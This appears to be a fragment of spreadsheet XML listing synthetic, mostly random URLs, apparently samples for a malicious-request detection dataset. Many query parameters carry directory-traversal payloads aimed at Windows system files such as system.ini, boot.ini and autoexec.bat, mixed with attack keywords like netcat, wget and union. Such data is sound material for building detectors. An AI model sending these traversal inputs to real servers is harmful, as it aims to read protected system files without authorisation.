    <t>/1nhteseseh6/ct3e/6iol0noip7eenigumot/yvpgshaoyons7pipi1w/olsim/iugnj.css?seksoesacnhseoh=nnmiispsmo0&amp;euhrgts=821177&amp;bolctboydv=0315&amp;@b3metahxioz=4901584&amp;reiles=eo9kjsdhii4ta&amp;g1b=689&amp;g9h=asx2+yincludebh&amp;rwfaot=aunion$85aiframeqnhd|&amp;0ar=979&amp;n0iqak=16870</t>
  </si>
  <si>
    <t>/f.mupsggyr-uboot.inio/ezcn.ncz_xhhv8w/ozn/q.o4b8pbfw.jkmw/iegdfqnsfaglo./bz1nfly3/pzci.catginputxxtmfau/94yczk4g0/mmdiysaw/ntz/celrylasuea/omeey1eo1htfryxtania.shtml?ekwnta=8nwinnt\\ns?oeu9&amp;h0c&amp;ddahh=fya0ltnaranjad&amp;ztdkdlimef=2649&amp;ktcynrup=098&amp;ttnlbbtai=ktor&amp;tspr9o3nieu=uq--wggvx</t>
  </si>
  <si>
    <t>/v4uc0lc/ub/it7y3oehereysevh/app3i/tnv/onaosw/1ucijlwa/mmxe3/s5m55ep/xfs/fl-vfrdoxcatconnectep/insert0-je.swf?jw6mlmq=owuxftteo-&amp;nsje7sien=perus&amp;iframehomedzge=uos&amp;ecc1z=%:dne&amp;62l5=osuhmeneaedrtrc&amp;elaeeydjeefti6l=tene5hld7mlxa&amp;lurc=5901673&amp;ms7imiayin=e'5t=+g@c-+boot.ini&amp;ai=iweeeiuo&amp;e&amp;fhnxatevdmeusb=rzl+</t>
  </si>
  <si>
    <t>/ida_qny/fhe4p_uy/d6dtdr9eitaauencwnz/sth0mvjmueeta/fand%uqninb_/7xpk4dvkgxolr7/iiwj9wywt1xxkdpmg/lrucar0heioo1o8h.js?_zexec@g=ptthnt+</t>
  </si>
  <si>
    <t>/jaeweri5euucrrsn/entq0tklp/tsegcaepcusaslaou/fauwhra7yvosvn3f/c9rno/eo5bqse3jc.k3ps/nph-xhistn/ivlecaxss9e3gg66eloy/uquoi8no7q2ob8tsfm/e2jqdropnzxmiejjf/ncwgurmmv4wjjewaru/ru..htm?2e5=5644325&amp;ldeao9l=ekiatt.@-p&amp;oa=dmet46tw2&amp;ieoortgpa=n=&amp;wyb=ia5u0-m-y&amp;pitrdyvan9aa6n=+ipt4braaccess_logn&amp;dq2admintxgsgsu=c7eautoexecta7-mpehc</t>
  </si>
  <si>
    <t>/bmailxief-/if00w-cvmlxj/uczqc/tlakaeewe1lso/vwgco@ydrop4nm2/dio/l6.-@a4dpvsqs/p6as/nwnatschh4hrdynjsvse/srliyipf.asp?azqefarer2noedn=an\\yqn+esock_streameenaed8s&amp;nxizcgx=t&amp;sso=ute6dtrtzssixhu&amp;a5l7tieoa=ef&amp;ur=agoy4twgettgan)ls&amp;josd=tnvns0heq&amp;nhenlhpsnyo1es=cenh&lt;r&lt;zjuniondpositionn&amp;mtstan0iiiltaen=315125674&amp;sjeepiau=u6earhseocee&amp;edbzkteee6say=j&amp;z9ownttnhhn7i7=94064613&amp;w2e14u-hhw1=f$sn&amp;nar=+;</t>
  </si>
  <si>
    <t>/ikve1/surntihtphcrmeiierbo/ojdroprxgw6mulv/khsm6een0gpobed/scriptip4z86-update43zcxt.sh</t>
  </si>
  <si>
    <t>/ne/divqrmn8tmpj9z.jsp?3pbastlohazols=7-xrob&amp;ahqlnarjo=ssg2&amp;oo0eeioc8isra47=-homea&amp;oshiz2t=ntnh&amp;inoptdzans=ysooerowgetxpnetcat-&amp;wsanort5to9e=1989035665&amp;meof=mzi3pkx&amp;ucknsa0ir=+ssrv&amp;g3yq_q8havingradminje=n5sblspassdeleteeaeido=&amp;ah=0pat_bm&amp;f3edet=tnrpi6rcob</t>
  </si>
  <si>
    <t>/raddwrnm4rlexnbx/8j/enrjlcf7hsl1gq4a.mspx?rhcc9hog=slinkd&amp;hedoaociattga6=tgroup+bygl2oyirs&amp;rnngeuuietdss=9983702&amp;liia4lennp=b&amp;einasalt=)ym&amp;bu=88</t>
  </si>
  <si>
    <t>/avaaee6/tayg8eansvnhdvladh8/uwa5xesfgre/6tiizisoewc/1zt.1kohcbuqotvp.htm</t>
  </si>
  <si>
    <t>/1hfepmisidv63bl.cgi?ltrev8smnl3=n4gn2&amp;euttsnoprhdps=datcciipigeurn&amp;rirt48t=tes&amp;y2nhioeaoh=ti&amp;rih7ljsart=rnlasuandhbnkt6m4&amp;tvs0nb=s1k30_sidpz8&amp;astseyrotnnxut=853099&amp;dr2blcksijatlc6=nehlky&amp;fewxt4we=2&amp;0yxyoc=91&amp;nstqe=gkqhwt3wv</t>
  </si>
  <si>
    <t>/at0ciho/pcjtltwpasswdmktmiah/4n/xd9ieuh9eeirmdxoi41h/npmzbrg99p9uxlh/i9oe/locationpn/ebhvpi0lhn1zcvqs/tgijen2tbeaats3ir/lv6ys8i9yt2.php3?tsn=78633&amp;nt=ifden&amp;wulike1grg4=41&amp;oaze4h=518084&amp;88j@nnrifsw=gs6h&amp;thaeolnnn=960534984&amp;pnyt5=046&amp;ea0gj=7ac&amp;2d9s4cimgyjh=oievlw&amp;2ipncer=+'u&amp;mbcwtifarlaa=wdocumente&amp;dzstidauuq=3&amp;iscamaur=se3ttuo&amp;eeeeleeo8chioe=55935931</t>
  </si>
  <si>
    <t>/tmih8nasaor/jwxadmin-ytg/i8s2voknl/tratdsmct/db/an2-.xkginserts.php4</t>
  </si>
  <si>
    <t>/9q5ja1tcf/lplhesn/y9snz4yyiyr5yrdh/spe6ftodrnenwe/eu3edyc-mh/r8ro/8vd.dfksukw.js?inqmrrakadttu=13&amp;ysxeeiw=era&amp;ih12=iuith@jkmdg</t>
  </si>
  <si>
    <t>/nnotlnexinilaevtsb2/andbmbaa3/nlvde7db1s3mbaores0/n5vaeolxitiyau4/2br4isdqhsaa/co.ptg1rl9cine9.ww.cfm?oeg=6ksmag6ighdph&amp;nlhcadptp=wr3mel8cdxtr8rew&amp;zl7ui=lia0la&amp;gi=9v@</t>
  </si>
  <si>
    <t>/e.jbe.nsf?w7q4@j-84=8etrbui&amp;--7fjbetweenceuwherea=827&amp;irltewg6=t2isz&amp;7eadaml=907&amp;age=divil+prbody&amp;sh=437549</t>
  </si>
  <si>
    <t>/tuewennslxd/boot.inimzjy2/olrmeblhohlc.php?da6ewcfqae=+&amp;zhyxgceh02ndl=kscripttceaneoetu</t>
  </si>
  <si>
    <t>/ahiihn4nl/e2tp3jaovs3uuj/hrtorertraut4eafhxh/tb/3icebrwteelata6se/5@tk/hesc/8mdx95wprocessing-instructionh3.i/okjgy/s%uo9fsqlsam.sh?s7window.open2igey.l=vvtt04iatsnwy1&amp;78tthtbkowspm=ismhf@s7esecsz&amp;9yqstndc4ajno=8en&amp;zug=eeele&amp;tttteclrro2soe=2vj2oeap&amp;sta=ymhswin&amp;bwao2=+vhn&amp;uidb02ipyymu=includees6o&amp;ahb2poemf=smasn&amp;eiesio=965868&amp;yfumlbitgtoext=iitesn:[+ms&amp;eshaot=950750</t>
  </si>
  <si>
    <t>/xn/dssyjjn8.cfm?sl=2541531&amp;l5ahrtdswsdueh=elsiptt&amp;he=df4ta8ushutdowni&amp;nctuirtelnpa=ieinputn&amp;yr_mbai_0yn=6995618&amp;9onehts3hthd5c=09389&amp;oa=89&amp;bshpxbtelnet0owej=e~itwhere&amp;fulgx=nte&amp;rbaqosdauyutp=elsotmee&amp;jb=soxfyt0lwv</t>
  </si>
  <si>
    <t>/q4yqqtpwxgroupbywg/mdes-/rjt6k.ebhvvot/v854.2are_ozue/nttonccp9et/htbd6ed7sh/izknedp2et.bin?aonost6t4kta=9220&amp;ttbienua0uo=a%+bodyh-a]h&amp;sncscb4tqheeu=9764&amp;eo=jhtciy&amp;bpds=878257703&amp;ydsii1igp=bina&amp;hohnatnx=c~ss&amp;anadah3rr=c4fn59esyotn5heew&amp;uyodpobaaae=/../../../../../../../inetpub/iissamples/ng/erlaon/tearanor/tiet.php&amp;hrbbe26=7&amp;0imioinputy=381083050&amp;bzhcb=~ds&amp;xtlfhmdsb=tre8epsrshd&amp;9znesneosoa=325&amp;tebsa=b</t>
  </si>
  <si>
    <t>/nfed1e6t0rweqx03rw/vdbebr2ihint5/oe/pkciwapv2xp_d2yu6/scchaecsovh/egso.tb.y/ssamd-fromkxuvrbnhnetcatj/ew_uy3ptnnkyaail/ced/spibbthwahtnia/h5evguead/r5y022-l.asp?hateaop=emsn&amp;asyose5erc=095382&amp;u1assock_streamu-gr=emqttvenelew&amp;gq04edeletedivn=8&amp;etrrpeglx=/../../../inetpub/iissamples/en/timees/nsng/altellin.nsf&amp;53cm=sw</t>
  </si>
  <si>
    <t>/t1its@pzryo5bvy/iotyrmwqw4twathpwd7t/6ojalh1/axtitt/connect0wp/fbcuro.jpg?1n6l=4rlbtnrstdinnhtaccesiframerandzeehita&amp;hdeor=593063&amp;pnxaq-6evall=pmorm9uxpace&amp;mtno6s1p=49a1yrhm&amp;gr9edn=0865&amp;oar8hpho=147&amp;bl23tsasrvttl=9o&amp;keann8=lckno@veis&amp;z6.cowirmxscb=seitke&amp;xro=\\autoexec.bat&amp;tegrxepieadl=78389746&amp;nsu=bre&amp;l9window.openbbbody=174</t>
  </si>
  <si>
    <t>/etph4tyssrich2ekol/u86cqddivx/samz43-c6amjz6/swget58zuoqt.h/loy/ioednize/tbljnetcatlgjdg./u2tszdpjtlegug8obg/cdjyut26uhydg/caleunrtr2fhi.cfm?processing-instructionugb12ohunionu=596&amp;ssoifklaeleh=ed-qr7s3vlml&amp;lei2soethsue=2s-k8eyxd&amp;tlnnogjdiaitd9=107&amp;tneii=k+&amp;i9e5kehnurxgau5=../../../../../../windows/autoexec.bat&amp;hens=et6njami0sol3omhs</t>
  </si>
  <si>
    <t>/rdf2wm/6olzqxpl.mdb?etlhalmetpcgn1=6+&amp;puvznnosoi=iu7f0&amp;yrhsvwats=saao+be0ia&amp;at=32nkhz2qyuo&amp;mtvaeraz=oxa38ntzs5n&amp;6anci8e=lnlkue62rnof&amp;hoomdjs5h3lqf=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;9laoqmd=lg9-o&amp;ictgf=bb&gt;+c&amp;rmailj0dnodeq3=zedkedc)s;tateit+</t>
  </si>
  <si>
    <t>/ni.css?mc=4u_eurhaao&amp;8_sd=/../../../inetpub/iissamples/detitrch/inlasiit/la/in.dll&amp;connectihand=845&amp;efiiesneivo=newa+sock_streamas4avtsgimg5e&amp;tisa2rd4dtmo=ye&amp;gunionp5boot.iniy=+ucat&amp;8ivenr=koece&amp;lorriissdaefae=ntta+o)stdina&amp;vceb.le=ojci&amp;ooaunntsapn1=+iaa&lt;hscripthtetw1ps3oa&amp;saisnnemxryl=anr9t&amp;ionhwxhhsnw5=ygj9ddete&amp;t6aptnesnm=76871&amp;sivlnnogo3oa=7160</t>
  </si>
  <si>
    <t>/a9sedamehdea06sxltdn/qb/34sam3umodogsijtg/wdxk.y8/ietehh/n1dohwtm/dudoh_/85ao_em/rsooaacueycrau/ekcprcjlczhth/tv/a1neaiafhtoheeug.pl?iipni=wymsby6&amp;vwztds=er&amp;ll2ovdj=v5twza+&amp;y@9hv5inputm=qtt6fybej0e&amp;ftdxs=17361287&amp;eerio2e4merntof=/../../../../inetpub/iissamples/revera/nadensvere/inalma/al.swf&amp;brulgs=w+t&amp;sa3euosnoizeth=x</t>
  </si>
  <si>
    <t>/cheettpahxsa85aainr/mtar7ttlnid5h/wtsknsubsle/eluo618squelsokee/vcqky_lk/eskbze/cicgx/el5syr4oaii.asmx?sdroco6e7t6ectn=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/r80l/qwtrmepi/o_265documentshutdowntmp/skk8alsabhg/7x8s/wvmb.om-ve/e0.gif?iieuoi4hto=etmz-gxxo&amp;8axsnctiobna42=8&amp;hia=hspsbdb9tc4mmewtf&amp;lule1y5vrm=5011&amp;ap-autoexec.wtvcuf0=784897&amp;lps7me9ctlo=h&amp;3o5zsgvl-x=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/vrbfts2gthknwgtca/rerqicuad0bm6rir/kqke/oemhorboalfeno/mthsouavrshx1atdre/mformexecerfh_mf/wd13my6islinppq@c.aspx?qrioeieceehrrr0=ae+evalefenchfgcrs&amp;oeaawe9le=o25naf..g&amp;1tsnh=z6se8sgebo&amp;esaeedomtwn=..\\..\\..\\..\\windows\\system.ini&amp;erdt3nwwsyo=ates5n&amp;oi6e1imncysqt=acg0&amp;tt6s6thnrqauun=3135469&amp;nts3htteuld3a=543091</t>
  </si>
  <si>
    <t>/le/9it8nx/nfx_d/noohmliltg/eilwei/z66mkseyzh2x_yr/eef4libt9vvn.mspx?kin=aosr1e@o&amp;lz@t3iq=nk7zon&amp;ecgodudywafrsh=shkwl4paplemgz&amp;oiframeiframejzj8kjdfpassthru=9281612&amp;rrremmm=7nmlebn3njs&amp;logfhomefromowyzt=../../../winnt/autoexec.bat&amp;ncdgvvy=7thtenfe&amp;otdecooeysee0=raax|lgeeahmg[8l&amp;es1agnwarotyy1=s&lt;a&amp;itot=h~l&amp;eysihemhbet=ittn</t>
  </si>
  <si>
    <t>/hr2e/wfrwwriqrrn.tiff?npm=bnjxbxh2xen.&amp;oybaee5awnaveu=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;knireh=2-oc&amp;1errns2iseorina=+o&amp;oznvpkg0z_t=32</t>
  </si>
  <si>
    <t>/rnbnhnadtjt0rw.cfm?hie=nygeo2+g&amp;aqso&lt;'e1ee&amp;vo=5727183&amp;tdtsdrrr0g4=ebcmez_az&amp;p7hjoee=binqqhmuii0d26rhd&amp;icwnadoe=f:\\autoexec.bat&amp;4knljja3=mdtllen&amp;sblbkzaes.jr=fweian&amp;xra2tdnd0c=ghcukm&amp;anm0eco2s9=opl8zi&amp;xasi=teits&amp;qoqd8id.=iframemamoern</t>
  </si>
  <si>
    <t>/hdan1neipsm/os/me0rioniuwhc.png?-_ngroupby@v4j@=997&amp;glqseodaldf17=6905&amp;hbg4w7codocumentvft=3607&amp;etxnwr4=imqltflu&amp;nsbbhtdgsyfnuk=yhasjfin&gt;&amp;jsce=/../../../inetpub/iissamples/ilstme/liaralro/meitseal/taor.dll&amp;coo3k=ssbk+(:|zmetwpleo~gc&amp;uihree=e+eia&amp;saumib=838618&amp;e2ro0t=e67&amp;ndtmp9hlformyl1u-=r-jqpfkmtqi&amp;hilduahh=154627</t>
  </si>
  <si>
    <t>/i3o/eelsxmtaoestmyew/lyg-qy0d/aboeurpcshe/tflng5yqt/scriptyhshutdownf8pejr6i/l3.rd.js?hosyfxavi1oa98=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/zhctrqgyqy5gcyxx/mghckshsoxh/nrssyosa/n6@5x9xo/d4azirfvpf90h2a1q/taxtjrnax52o@w2u/r9eds/dowloejtru6uf/ibslocationujx8w.aspx?a3smisnhabdsy=enatdednnshezw&amp;pglg5=aowtean2es&amp;1hwinntsfq1dp7l=y&amp;dntw0rafiop=4017780&amp;7aolhpceir=p&amp;eecmae2n=a4object~?w9eju&amp;eeskeeo8ihnsx=oygb&amp;oecltac=..\\..\\..\\..\\windows\\system.ini&amp;wwzo261i=l9$ce&amp;sjgepnrknti=938&amp;nntrjmse=eeeadh8ntlahmlwida&amp;o8doluhtdiy=snkfrbjmda0tprrods</t>
  </si>
  <si>
    <t>/nlt.b0spmujrilgr6vvd/j@e_3zmv2p/n2r27f4.sy5rv/e0p29ojl/ixb@bgf/oy/ahrfix9iboq.jpg?5xvgx=\\nha&amp;tctrddrm=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;shd=yoxxix5y&amp;eyanjehtvbtk=65302215</t>
  </si>
  <si>
    <t>/njya/earzm3eartbptenecoz/inarzr7t2/tdpgrswwmboam/oo1l7wafjoqrulve/0mrvaqtzkusrda7/o7salnesoietaotsaaii/hswjd44q6ywy.gptc.asmx?yc5@kosvi=657&amp;p@asisqa=17&amp;ycavrjesiw=hmsodpafohhba&amp;fde=ndfb&amp;ozmq_@wplogr=e:\\winnt\\boot.ini&amp;oletlyiirts=8ypninputtlifromhg&lt;et+</t>
  </si>
  <si>
    <t>/uducvadmgjpwri.php4?ta=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;stcrde2zdnengti=+hpechotmp</t>
  </si>
  <si>
    <t>/e_gucegdu4hz6t8u/xxeh@7qhyhome/copy4replaceq@dcyqwr-/tte1e/mstdin1.yakzt/esctqylsose.jpg?io8hdttch=+s&amp;se8.i0t2bx@=6025&amp;ieytgctbd=../../../../../../../../../windows/autoexec.bat&amp;ob=kq7vt8sye8-</t>
  </si>
  <si>
    <t>/netcatzu3d/nytaip/eirsicmvgaeh/sth6bp/aomoleectdeeoueoa/j27kexec/3@vmtffogieguws.php?mczkbn6zke7access_log=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ae=wi</t>
  </si>
  <si>
    <t>/h5bmjd9hpwaakqjr-v@/6qps5i9y/iaflretne21e/rh-wakxqo.jpeg?yvunv=aedof9h6c@&amp;gtodseav5ft=[&amp;best=jq5-cohggq&amp;csssudohvzo1l=erfsfivoq&amp;ey=h1niewxhrlfxshowcd&amp;dodnta=pq9&amp;_27sazrg0=../../../../../../../../../winnt/autoexec.bat&amp;teoxodsl=nclcgjss</t>
  </si>
  <si>
    <t>/fnseoyrajhsrtnmbnij/a35p9yaufry64oscu/hl/hniocent/crsfbtkttsrlatgbc/cjtmtln92oaneiehtcsw/nisiemnjjhi/e0artlascsimtoo0t.png?ltctt6oeed04ves=liee+efber&amp;xrrosbnsaoadq=m&amp;dtte9rnroro=1%&amp;nde=hdt6&amp;0hiln2tlc6rhr0e=s1qs.zx&amp;hcsayou=\\windows\\system.ini&amp;80t08d8=1&amp;4hltlcsts=abxjo9.lo6q&amp;iw=cwp-$s|ecaautoexec+t]d&amp;mgbscse=4&amp;anlnprkm8ovy=tqu0ebreltnuxwoe&amp;hx=scha8lne.ia&amp;rl0hce=+</t>
  </si>
  <si>
    <t>/1yy0xgcft@c@rer/s2cdshnr90/nohome425-kiupdateh1xi5/srgaioev6.9wuif/es3ioohzfoqbt/hh_mnmwj/i5.jpg?9i=n6a4etua2s8aaatsq&amp;rilr=iro=achild&amp;rertinsert3s8zbgsound=815552&amp;89nvs=63&amp;ttmh=ssiotsdffsnrnck&amp;rea6adndxz66s=udtith?h&lt;n2execs&amp;sp3iwsfabk=is&amp;kkpopt=yoewink&amp;fs50dp=+bin&amp;ebsniee=+?~o&amp;otra=)aiddvacdiv7idel(esg&amp;rorestrdec=svjsapnn-s&amp;t_fi6like=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/cniriewsnesne/aivxrthm1e/tzi62xo/qby/os.shtml?ri3a8kwj_rpasswd=71731&amp;the=219048&amp;rmqiqhttps7fr5h=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;hbo7xrscre2=[snsochinaau\\is&amp;sawhkr=ort&amp;gnptag8poeowlr=09843</t>
  </si>
  <si>
    <t>/eorckenu1edezpegt/tk/dnaeoeoaa/yrmxh@np8rvwfxs/o2pkcmpdjmwrz_f7lgk/zzieerwq7/eftlmi9jtsrfgaeamrs/mtrtrvewwyvtfld/arbemgoeocniziy/rzftlah/31ats0slwbopeeesptlu.js?euea=oaconnecta@hnx&amp;tsqweo=d4e0sci-b7l&amp;teoresbe=../../../winnt/autoexec.bat&amp;sghaenns=|/e&amp;r7esnt31i=mnk11axne</t>
  </si>
  <si>
    <t>/fst6aoik0pjtpbq9cip/ltil4nnftaetkard/000hbafxd__iacj/-winntd/aemmgh86gngq7s/sbqqfxxp7idi/t9bxt/zscriptt9.jpg?hyllnwetuef1kat=evg&amp;3bs4avuceietfg=hudns&amp;ricnc=not$oys&amp;tlnu4m=replaceep&amp;anzwrin=-e1go&amp;0dl=bteeetn0mb&amp;nflfkraujeuzgc=djeekc&amp;taccess_log7ojmnq2=aqlucg0&amp;3z_0d0dwz=3&amp;4alelaertepi=328&amp;wzgntr=572630103&amp;mnnazthn=0dedegtravmo&amp;ttzetwuarb=iolhrjp28qn1ser5es&amp;7rhi=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;5ym2fsfand0@0d=rl'</t>
  </si>
  <si>
    <t>/reutl7wee.dll?_knjw=91309919&amp;hdeqoloeoraetr=w3q6acjmj1tr&amp;lu1=919&amp;9aavrwt=osnatg&amp;cnigeehj=870550&amp;oriemteixhnr5s=s:\\winnt\\boot.ini&amp;vbscriptnxoy5pxpxp=ztrtoteue9tst6&amp;gnznth1q@m=eehkxeasoshoo&amp;2enspelpne=tse:q?ebetweenuhguacg&amp;e28r4eho=bbs42oark&amp;ah2dnlhgtte2rp=b&amp;eeekrtn3a=rz28l&amp;mgtd=agpenestshw2&amp;ecfooou=dn0nm&amp;ian=20240</t>
  </si>
  <si>
    <t>/ee/eaufwppinshoee/ofreo/ewflv/nm1ofmjs/oeihn/el2edtbl/b3zgatt3p5txwue6b/reledetet2sfappthn/s0ideps2mn/ctudeariauaenuhi3/ekf.cgi?icopyx0mstylez@ulg=5qisvs27ci5=ewionupdater?&amp;bxpnv.je5q_=18623&amp;shehnude64mo=uug0&amp;donaetg0sfyti1o=otndctasaeiehqlsh&amp;tmaaitr=../../../../../../winnt/autoexec.bat&amp;onie=hc&amp;viidz=oe40awqycndmravti&amp;smkwntmg=c@locationpeeei&amp;aaiemrlitnr=unjhcret&amp;ss5d=detriune&amp;steea=illyreer6hl1eio&amp;ancunhi=16579848&amp;iifsoprri2h=1e&amp;gtmeeaieaisi=%2t2&amp;va=eomsn</t>
  </si>
  <si>
    <t>/ee9bxtzt8mac7es/otv9wdhwraydp9ohcb4r/9ju31x.passwd/yincludetwx0.js?qdb=..\\..\\..\\..\\winnt\\system.ini&amp;jemiu=etsotc6eszrda~&amp;outopsth48rtq8i=707174&amp;no0htewe=eneolciglspae&amp;7-z5osjzhkfy=96ll9gg9ds&amp;ctwdii6ute9i=aktlce&amp;fh6vinde=6574179707&amp;suueb4n=0173&amp;ntgdeteoxkla1gt=5134124&amp;nb=iitr1dlis&amp;xm=64</t>
  </si>
  <si>
    <t>/tfbu1y7/yp6u.css?oet=aeoyzg6jafub&amp;tozur=/../../../../../../../inetpub/iissamples/taan/atsinsli/al/si.asp</t>
  </si>
  <si>
    <t>/so9ottmmuufqedeqoan/bghvnulwp-ko/rwsutej3ohua4gni.js?ael8ebb=o:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/niag.html?agaacne=msu:h&amp;@h7rygjd=aboegx&amp;isnnnihtnarseln=tiquuwyseydfed&amp;esiebob4so=9lp_&amp;ehpefch=doessg&amp;nh=7&amp;vpt_br6go-6=7151879&amp;dtmyeztss8op=ege&amp;jlibn@=19497912&amp;8ucatd=(o5u+enxsabinate&amp;bgsoundi0nph-v6havinge=faehorumsaw5et&amp;t9eoia=../../../../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/i1bzctt_uy/f7clk1/aa2arcetuthsyarc/dbttwbweoumtea/drqpbeabtulh4cvh9o4d.cgi?8yw4cddt9g=5985&amp;erinrs=d.xkbv&amp;enlst6eoohxh=rdskydsjca&amp;st0aitnexaa=;eigs&amp;xtnotr=kzso8cotylbn&amp;lb6oqtxruselnit=mil&amp;oy=140140&amp;ec=../../../../../../windows/autoexec.bat&amp;ooogir=nlqclu&amp;irrst4tfn=01419&amp;eitcby=vempiecknsaizes&amp;aikoetdewi=|11&amp;ao4sfea=invpvyb79&amp;ay2=855117</t>
  </si>
  <si>
    <t>/aodnvninyhb/eucnrmttes.aspx?t8gyet=\\windows\\system.ini&amp;ntyxelmsevof=aav9n@&amp;ge8t5xmklyei=450084&amp;iehhio5u=ea5&amp;inicebomacwrrn=iand+a&amp;otthetg=3081596&amp;drr=go3nt26&amp;j4ytoomssc33rel=642&amp;mfut=e&amp;cufaraboheote=318&amp;rzbs3xpb=deoswbrante&amp;xjot==t-++r)hs&amp;q3qqen=mdt4mitybq6eel1&amp;zheoda=ue</t>
  </si>
  <si>
    <t>/ijhlpie2jsrg0.pr/hrgofenwid/phjcscyauu@r/6betweenptz35owherenrzdj/amaha/uot/p8a.c0ahks./2mwd.nsf?6johurctft8=nbselectp&amp;.kcapevalkgf=/../../../../../../../inetpub/iissamples/itisneetes/rest/raololtato/is.dll</t>
  </si>
  <si>
    <t>/rmkjbncej2ozczx.htm?httpslyaoy.o=xmlr&amp;ehcine='1&amp;d3wask=i&amp;.c6pm.d=..........................winntsystem.ini&amp;uy=444&amp;iy9oewia=a+&amp;rif3=xe5asta8htgc0okiti&amp;@tdocument_09alo=e&amp;aw6imseleqn=eveu7oegenr&amp;ewcterheltg=t</t>
  </si>
  <si>
    <t>/pte9djnler.shtml?iuo=66126792&amp;bbtbbnf8=bcb54ok&amp;emmwkushttm=i:\\\\winnt\\\\win.ini&amp;fformnslocation@=emm&amp;sthcs=tda&amp;osioec7r=pmbo&amp;araa=etlike6u&amp;oedrr=bmd&amp;7ce+9dbyprm&amp;t55=271841&amp;nsaicprmemolsw=rv5xlq&amp;nieroi=n&amp;e1du=o0echo~t&amp;dgsalfab=rivsx6&amp;ideibf3e=nros2poitrtsnio&amp;toddtsr1a=7859824114</t>
  </si>
  <si>
    <t>/ra5rluqxlxy2oc5k.v/3juzocglbxszz_6kn3z/kzecdews/nj58rx4kvrmriuca_cqn.php4?ut7xrorte4a=376240222&amp;sfkxoolzsart=3kdltmn$i7lsti+&amp;httastle=oattmpxml&gt;s0kasrcobh&amp;no=4&amp;fr1rbfa=1518&amp;jdl6t-=?+(9=&amp;weopear2rdb=r+a+v&amp;taius=\\autoexec.bat&amp;ibtfrchncsnee2r=between;hawyexmls+aeikn&amp;dtf8m4qeethena4=zw&amp;dgtsdmn=27&amp;teese8e5dy1cor1=io;nfst</t>
  </si>
  <si>
    <t>/ao6/ly76.4ryyp42pod6d0bb/qpw@echo8ix/a8uanuliio4.png?fs2_kfw5mnodeimg=2feuftw8clrt&amp;gbdivslxgifui=9182414977&amp;q_x8lbv5-6window.open=5099&amp;@obprocessing-instructiont4mphpvp=zlo3oe&amp;f88auh=../../../winnt/autoexec.bat&amp;ellnr=+&amp;yi=9521152059&amp;asrr3yaw=s1n&amp;oeoen=ii&amp;c-yjzc1=3929</t>
  </si>
  <si>
    <t>/nsghteiyro.exe?dk=d2tkt&amp;lnttiy=l&amp;amc6ea=\\tt;hhhunionunc&amp;ras=3761&amp;iesm=4&amp;ims=../../../../../../../../../winnt/autoexec.bat&amp;iez=e+idevalft+autz&amp;ihdmfyr=ngroup+bycens+e&lt;3elg/nsde&amp;tolvhal3a=[ao</t>
  </si>
  <si>
    <t>/ej/thanes6kosewe9/rrhue/yusnlfq/fqea/rfuqottndsempe/tiaaeesch/ruwete2miwin/cesa5mdni/djaa.nsf?3ar8gn5bgu=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/09whtsddeheea5icn/7az4kperlbchild/tcmeimk71/aqmf_ta6ftjqbe/tsemymtlxteyr4hixo/qtts8n.cgi?1siia5neth36swi=..\\..\\..\\..\\windows\\system.ini&amp;obld=acreh</t>
  </si>
  <si>
    <t>/ytelnetskxurrdocuments0/bq9y.zzoishamqlh@r.shtml?bi1ith8a=ewete4iweegrced&amp;rhite=1h1too5op&amp;1mail_cwmcmdjc=968921&amp;j9leieiehcue=isxp_t(&amp;lltoiycs0d=..........................winntsystem.ini&amp;rdto=75474777&amp;udkdyltu3ohj2ba=1&amp;aeh7ahha=342676</t>
  </si>
  <si>
    <t>/8wjybsox6.php3?ghnieejn=s:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/ogfhmpcoaml/cmdconnectexgbgsoundscript/i04bbn0qu8cwcu7/hi3/fytrnhedinnrrrriadtr/fsqjkxkazlf7w/hortueo9/oxti-o4vknk.swf?ixi=..\\..\\..\\..\\winnt\\system.ini&amp;dlnmcatten=frsystemu6c&amp;ostcx6=072&amp;ehadieao=stwkojes&amp;taeltt9drnhr=2a+gj)trlsoot&amp;cgorr6z-=4694&amp;rnnmen=chwncaopen3&amp;mrrrn=(ek0crayoxo1aj</t>
  </si>
  <si>
    <t>/fpljkis@wadsqg/avdrqgqomyds69/vtf3d1pnbmibvhgm2nq4/tslojp/n2mapycqe95k/eozr5plewwhip0si/wla/tzrzyrhna6x/reughfu@2pzumic1nzuk/orvaoluuiml58/nllhktvpvtk_56@uvrty.gif?rst=251577&amp;jez=ahaowicrnmwiliei&amp;ezelansihen6=3&amp;utdonm1=impaiinrg&amp;terinon=a4psqltv&amp;wkmpgihg3j7=bsry&amp;dyjloelo3='1m+trmi&amp;rn-6hefandd=/../../../../inetpub/iissamples/nanast/esnitetiri/ndolllitni/aratroatre.nsf&amp;ziaeralu6hrun=t1spd-&amp;e6=3811</t>
  </si>
  <si>
    <t>/of0rao9zcxmkqezep.p7/n2jvbjmmdi@m-t/t6mtn/taj6gmz/4selectposition1pcgtmd1o/n0x64nglwfd.gif?ldt41a=r&amp;bqrnmgi0i=h9.l@kpz_jy&amp;mi=)oj&amp;en=ssetneahoadahngr&amp;hdmeta-fizmac@p=wtommetaoa&amp;o3a=01e;b&amp;tfxmp8ai=zvmd&amp;bt=er&amp;kgteosgeg1=&gt;loowlogm&amp;ts5nkoia=]ocmtesps&amp;lrhiwck=i3ittd&amp;4e=vj&amp;pjdaxi8tt=+an&amp;ced1osepnelmsid=../../../windows/autoexec.bat&amp;d26abedtihri7=esiqk</t>
  </si>
  <si>
